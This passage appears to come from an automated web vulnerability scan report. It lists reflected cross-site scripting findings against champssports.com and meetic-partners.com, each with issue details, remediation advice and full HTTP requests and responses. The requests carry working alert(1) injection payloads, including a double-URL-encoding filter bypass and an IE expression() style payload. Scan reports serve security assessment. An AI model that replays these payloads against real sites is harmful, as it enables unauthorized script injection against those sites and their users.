Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 151836
Date: Tue, 02 Aug 2011 13:15:03 GMT
Connection: close
Set-Cookie: SSLC=web%2D41;domain=.champssports.com;path=/
Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:03 GMT;path=/
Set-Cookie: RECENTSKULIST=0571248763dca%27%3Balert%281%29%2F%2Fed42f472d7a%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/
Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:03 GMT;path=/


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
<script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
<!-- web-41 -->
<script type="text/javas
...[SNIP]...
<!--
try { document.domain = "champssports.com"; } catch(exc){}
var cm_Attributes = null;
var co_cd = '20';
var thecurrentsku = '0571248763dca';alert(1)//ed42f472d7a';
var cm_ProductTemplate = null;
var cm_microsite = null;
var cm_ClientID = '90102184';

   cmSetProduction();
   cm_HOST = "rpt.champssports.com" + "/eluminate?";

//var submissionURL = "";
/*function ra
...[SNIP]...

2.166. http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.champssports.com
Path:   /catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e179%2522%253balert%25281%2529%252f%252f9a08bb042a0 was submitted in the REST URL parameter 4. This input was echoed as 4e179";alert(1)//9a08bb042a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /catalog/productdetail/model_nbr--151878/sku--057124874e179%2522%253balert%25281%2529%252f%252f9a08bb042a0&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1
Host: www.champssports.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 151851
Date: Tue, 02 Aug 2011 13:15:00 GMT
Connection: close
Set-Cookie: SSLC=web%2D44;domain=.champssports.com;path=/
Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:00 GMT;path=/
Set-Cookie: RECENTSKULIST=057124874e179%22%3Balert%281%29%2F%2F9a08bb042a0%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/
Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:00 GMT;path=/


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
<script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
<!-- web-44 -->
<script type="text/javas
...[SNIP]...
<script type="text/javascript">
       var dtm_promo_id = "5";
       var dtm_brand = "Nike";
       var dtm_gender = "Women's";
       var dtm_team = "";
       var dtm_sku = "057124874e179";alert(1)//9a08bb042a0";
       var dtm_img_url = "http://www.champssports.com/images/products/large_w/057124874e179";alert(1)//9a08bb042a0_w.jpg";
   </script>
...[SNIP]...

2.167. http://www.champssports.com/catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.champssports.com
Path:   /catalog/productdetail/model_nbr--151878/sku--05712487&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74a4e"style%3d"x%3aexpression(alert(1))"599d441c396 was submitted in the REST URL parameter 4. This input was echoed as 74a4e"style="x:expression(alert(1))"599d441c396 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /catalog/productdetail/model_nbr--151878/sku--0571248774a4e"style%3d"x%3aexpression(alert(1))"599d441c396&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1
Host: www.champssports.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 152217
Date: Tue, 02 Aug 2011 13:14:56 GMT
Connection: close
Set-Cookie: SSLC=web%2D43;domain=.champssports.com;path=/
Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:14:56 GMT;path=/
Set-Cookie: RECENTSKULIST=0571248774a4e%22style%3D%22x%3Aexpression%28alert%281%29%29%22599d441c396%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/
Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:14:56 GMT;path=/


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
<script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
<!-- web-43 -->
<script type="text/javas
...[SNIP]...
<meta property="og:image" content="http://www.champssports.com/images/products/cart/0571248774a4e"style="x:expression(alert(1))"599d441c396_c.jpg" />
...[SNIP]...

2.168. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [645868;97831;0;%5btimestamp%5d;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/645868/ishow23.asp

Issue detail

The value of the 645868;97831;0;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6ad5'-alert(1)-'dc98966ff37 was submitted in the 645868;97831;0;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/645868/ishow23.asp?645868;97831;0;%5btimestamp%5d;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061c6ad5'-alert(1)-'dc98966ff37 HTTP/1.1
Host: www.meetic-partners.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=103258d905
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; pbw=%24b%3D9999%3B%24o%3D11061; TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDSATBACTQ=CFHLCAGACLNPPDPPADAEMKML

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:41:20 GMT
Content-Length: 555


<html><head><title></title></head><body><div align=center>
<script language=Javascript>

var sas_iframe = document.location.protocol + '//www.meetic-partners.com/diff/58/645868/show23.asp?645868;97831;0;%5btimestamp%5d;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061c6ad5'-alert(1)-'dc98966ff37';
document.write('<scr'+'ipt language="Javascr'+'ipt" src="'+sas_iframe+'">
...[SNIP]...

2.169. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [645868;97831;0;[timestamp];M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/645868/ishow23.asp

Issue detail

The value of the 645868;97831;0;[timestamp];M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 888a4'-alert(1)-'09c45d96d2 was submitted in the 645868;97831;0;[timestamp];M;systemtarget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/645868/ishow23.asp?645868;97831;0;[timestamp];M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061888a4'-alert(1)-'09c45d96d2 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=10325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; pbw=%24b%3D16999%3B%24o%3D11061; TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:37:55 GMT
Content-Length: 551


<html><head><title></title></head><body><div align=center>
<script language=Javascript>

var sas_iframe = document.location.protocol + '//www.meetic-partners.com/diff/58/645868/show23.asp?645868;97831;0;[timestamp];M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061888a4'-alert(1)-'09c45d96d2';
document.write('<scr'+'ipt language="Javascr'+'ipt" src="'+sas_iframe+'">
...[SNIP]...

2.170. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/645868/ishow23.asp

Issue detail

The value of the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7f93'-alert(1)-'126beb4f879 was submitted in the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/645868/ishow23.asp?645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061%3B%24c%3D42%3Be7f93'-alert(1)-'126beb4f879 HTTP/1.1
Host: www.meetic-partners.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=103258d905
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; pbw=%24b%3D9999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDSATBACTQ=CFHLCAGACLNPPDPPADAEMKML; pbwmaj6=y; pdomid=18; pid=6855282135832214373

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:41:34 GMT
Content-Length: 588


<html><head><title></title></head><body><div align=center>
<script language=Javascript>

var sas_iframe = document.location.protocol + '//www.meetic-partners.com/diff/58/645868/show23.asp?645868;
...[SNIP]...
imestamp%5d;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D9999%3B%24o%3D11061%3B%24c%3D42%3Be7f93'-alert(1)-'126beb4f879';
document.write('<scr'+'ipt language="Javascr'+'ipt" src="'+sas_iframe+'">
...[SNIP]...

2.171. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/645868/ishow23.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8248'-alert(1)-'61f5f4b6355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/645868/ishow23.asp?645868;97831;0;[timestamp];M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061&c8248'-alert(1)-'61f5f4b6355=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=10325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; pbw=%24b%3D16999%3B%24o%3D11061; TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:38:01 GMT
Content-Length: 555


<html><head><title></title></head><body><div align=center>
<script language=Javascript>

var sas_iframe = document.location.protocol + '//www.meetic-partners.com/diff/58/645868/show23.asp?645868;97831;0;[timestamp];M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061&c8248'-alert(1)-'61f5f4b6355=1';
document.write('<scr'+'ipt language="Javascr'+'ipt" src="'+sas_iframe+'">
...[SNIP]...

2.172. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;109706383;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/673819/show27.asp

Issue detail

The value of the 673819;97831;6525761750539601382;109706383;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f36f5'%3balert(1)//fa7f3485bd6 was submitted in the 673819;97831;6525761750539601382;109706383;M;systemtarget parameter. This input was echoed as f36f5';alert(1)//fa7f3485bd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/673819/show27.asp?673819;97831;6525761750539601382;109706383;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920;smartclicktrack=http://clk.atdmt.com/go/115052954/direct;wi.300;hi.250;01;ai.197578320.152638442;ct.2/01?href=f36f5'%3balert(1)//fa7f3485bd6 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9ECH&cb=1778598890
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; ASPSESSIONIDCQACTRDS=OGMPNNIALOCKKOONLHAJCLHK; pdomid=13; pid=6525761750539601382; ASPSESSIONIDAQBBAQTT=DIDACOEAGBADJMLCDNDIMIKD

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 13:11:35 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115052954/direct;wi.300;hi.250;01;ai.197578320.152638442;ct.2/01?href=f36f5';alert(1)//fa7f3485bd6http://www.meetic-partners.com/diff/58/673819/go141.asp?673819%3B97831%3B6525761750539601382%3B109706383%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.173. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;247433133;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/673819/show27.asp

Issue detail

The value of the 673819;97831;6525761750539601382;247433133;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba096'%3balert(1)//f4996b0af5e was submitted in the 673819;97831;6525761750539601382;247433133;M;systemtarget parameter. This input was echoed as ba096';alert(1)//f4996b0af5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/673819/show27.asp?673819;97831;6525761750539601382;247433133;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920;smartclicktrack=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=ba096'%3balert(1)//f4996b0af5e HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152%5F2199%5F15404t; ASPSESSIONIDSATBACTQ=BPMHCAGALNPNCJJHJEBKCPOL; pbwmaj6=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920; TestIfCookie=ok; TestIfCookieP=ok; ASPSESSIONIDCSARTSQB=MAJBBJJAENBAFMGJECJNJNDE; pdomid=13; pid=6525761750539601382

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:57:49 GMT
Connection: close


var innerCode='';

function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"]
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=ba096';alert(1)//f4996b0af5ehttp://www.meetic-partners.com/diff/58/673819/go141.asp?673819%3B97831%3B6525761750539601382%3B247433133%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2
...[SNIP]...

2.174. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [673819;97831;6525761750539601382;392249101;M;systemtarget parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetic-partners.com
Path:   /a/diff/58/673819/show27.asp

Issue detail

The value of the 673819;97831;6525761750539601382;392249101;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac38b'%3balert(1)//2aea9aa7199 was submitted in the 673819;97831;6525761750539601382;392249101;M;systemtarget parameter. This input was echoed as ac38b';alert(1)//2aea9aa7199 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/58/673819/show27.asp?673819;97831;6525761750539601382;392249101;M;systemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%24qpc%3D95122%3B%24qpp%3D408%3B%24qt%3D152_2199_15404t%3B%24b%3D16999%3B%24o%3D11061%3B%24sh%3D1200%3B%24sw%3D1920;smartclicktrack=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=ac38b'%3balert(1)//2aea9aa7199 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=973146214
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
